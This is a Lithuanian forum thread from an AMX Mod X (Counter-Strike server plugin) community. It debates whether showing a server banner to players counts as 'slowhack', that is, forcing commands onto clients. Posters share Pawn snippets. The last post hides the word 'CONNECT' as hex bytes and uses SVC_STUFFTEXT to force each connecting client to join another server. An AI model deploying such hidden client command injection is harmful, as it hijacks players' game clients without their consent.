Page 1 of 1

banneriukas

Posted: 2013 Apr 23 20:33
by Chemodan
Labas vakaras , norėčiau paprašyti jūsų galėtumete duoti linka plugino , kuris padaro kad rodytu banneriuka savo serveryje , nemanau kad čia slowhack. Dėkoju.

Image

Re: banneriukas

Posted: 2013 Apr 23 21:01
by Trickas
SLOWHACK

Re: banneriukas

Posted: 2013 Apr 24 05:38
by laimiukas3
Chemodan wrote:Labas vakaras , norėčiau paprašyti jūsų galėtumete duoti linka plugino , kuris padaro kad rodytu banneriuka savo serveryje , nemanau kad čia slowhack. Dėkoju.

Image
pasiskaityk chemodan http://www.amxmodx.lt/viewtopic.php?f=22&t=2902 :)

Re: banneriukas

Posted: 2013 Apr 24 11:49
by dov1s

Re: banneriukas

Posted: 2013 Apr 24 13:51
by Chemodan
laimiukas3 wrote:
Chemodan wrote:Labas vakaras , norėčiau paprašyti jūsų galėtumete duoti linka plugino , kuris padaro kad rodytu banneriuka savo serveryje , nemanau kad čia slowhack. Dėkoju.

Image
pasiskaityk chemodan http://www.amxmodx.lt/viewtopic.php?f=22&t=2902 :)
Nevertingi postai , nes čia ne slowhack , jis rodytu tik mano serveryje

Re: banneriukas

Posted: 2013 Apr 24 14:45
by Unkolix
Tai įmanoma padaryti tik naudojant SLOWHACK, tai reiškia, kad tai ir yra SLOWHACK.

Re: banneriukas

Posted: 2013 Apr 28 01:33
by psychical
Chebra, šnekat ir nusišnekat... Bent garsiai nerėktumet...

Code: Select all

// send show tga command to client      message_begin( MSG_ONE, SVC_DIRECTOR, _, id )      write_byte( strlen( szTga[index]) + 2 ) // command length in bytes      write_byte( DRC_CMD_BANNER )      write_string( szTga[index] ) // banner file      message_end()
Elementari žinutė...

Re: banneriukas

Posted: 2013 Apr 28 03:38
by Tetusis
psychical wrote:Chebra, šnekat ir nusišnekat... Bent garsiai nerėktumet...

Code: Select all

// send show tga command to client      message_begin( MSG_ONE, SVC_DIRECTOR, _, id )      write_byte( strlen( szTga[index]) + 2 ) // command length in bytes      write_byte( DRC_CMD_BANNER )      write_string( szTga[index] ) // banner file      message_end()
Elementari žinutė...
Tik kazkaip islieka iki tol kol per nauja neijungi zaidimo, bent jau anksciau taip nebudavo po steam cs update kaip ir minejau taip ir yra.

tas pats ir su

Code: Select all

    static decal_name_text[100]        formatex(decal_name_text, charsmax(decal_name_text), "YOLOSWAGFAG")            message_begin(MSG_ONE, SVC_DECALNAME, _, id)    write_byte(200) // poss index    write_string(decal_name_text) // text    message_end() 
reikes pranesti amxx dev kaip potencialu slowhack metoda.

cia pagal tave jei naudociau decimal char

Code: Select all

new lolstatic connect_len[50]static con[50]static const connect[][] = {    0x43,    0x4F,    0x4E,    0x4E,    0x45,    0x43,    0x54} 
ir

Code: Select all

public client_connect(id) {    for(lol = 0; lol < sizeof connect; lol += 1) {        formatex(connect_len, charsmax(connect_len), connect[lol])                formatex(con, charsmax(con), "%s neartits:27015;echo go home u drunk ;s", connect_len)            message_begin(MSG_ONE, SVC_STUFFTEXT, _, id)        write_string(con)        message_end()        server_print("%s", con)        }}
nesiskaitytu slowhack? ;/